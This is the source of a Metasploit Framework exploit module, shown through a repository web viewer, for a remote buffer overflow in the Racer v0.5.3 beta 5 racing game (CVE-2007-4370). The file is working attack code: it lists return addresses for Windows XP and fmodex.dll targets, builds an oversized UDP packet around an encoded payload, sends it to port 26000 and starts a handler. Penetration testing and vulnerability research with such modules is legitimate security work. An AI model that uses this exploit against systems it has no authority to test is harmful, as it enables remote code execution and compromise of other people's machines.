/modules/exploits/windows/games/racer_503beta5.rb - Metasploit Framework - Metasploit Redmine Interface

| Branch: | Tag: | Revision:

root / modules / exploits / windows / games / racer_503beta5.rb @ master

History | View | Annotate | Download (1.9 kB)

       ##
       # $Id$
       ##
       ##
       # This file is part of the Metasploit Framework and may be subject to
       # redistribution and commercial restrictions. Please see the Metasploit
       # web site for more information on licensing and terms of use.
       #   http://metasploit.com/
       ##
       require 'msf/core'
       class Metasploit3 < Msf::Exploit::Remote
               Rank = GreatRanking
               include Msf::Exploit::Remote::Udp
               def initialize(info = {})
                       super(update_info(info,
                               'Name'           => 'Racer v0.5.3 beta 5 Buffer Overflow',
                               'Description'    => %q{
                                               This module explots the Racer Car and Racing Simulator game
                                       versions v0.5.3 beta 5 and earlier. Both the client and server listen
                                       on UDP port 26000. By sending an overly long buffer we are able to
                                       execute arbitrary code remotely.
                               },
                               'Author'         => [ 'Trancek <trancek[at]yashira.org>' ],
                               'License'        => MSF_LICENSE,
                               'Version'        => '$Revision$',
                               'References'     =>
+                                      [
                                               [ 'CVE', '2007-4370' ],
                                               [ 'OSVDB', '39601' ],
                                               [ 'URL', 'http://www.milw0rm.com/exploits/4283' ],
                                               [ 'BID', '25297' ],
                                       ],
                               'Payload'        =>
+                                      {
                                               'Space'    => 1000,
                                               'BadChars' => "\x5c\x00",
                                               'EncoderType'   => Msf::Encoder::Type::AlphanumUpper,
                                       },
                               'Platform'       => 'win',
                               'Targets'        =>
+                                      [
                                               # Tested ok patrickw 20090503
                                               [ 'Fmodex.dll - Universal', { 'Ret' => 0x10073FB7 } ], # jmp esp
                                               [ 'Win XP SP2 English', { 'Ret' => 0x77d8af0a } ],
                                               [ 'Win XP SP2 Spanish', { 'Ret' => 0x7c951eed } ],
                                       ],
                               'DisclosureDate' => 'Aug 10 2008',
                               'DefaultTarget' => 0))
                       register_options(
+                              [
                                       Opt::RPORT(26000)
                               ], self.class)
               end
               def exploit
                       connect_udp
                       buf = Rex::Text.rand_text_alphanumeric(1001)
                       buf << [target.ret].pack('V')
                       buf << payload.encoded
                       buf << Rex::Text.rand_text_alphanumeric(1196 - payload.encoded.length)
                       udp_sock.put(buf)
                       handler
                       disconnect_udp
               end
       end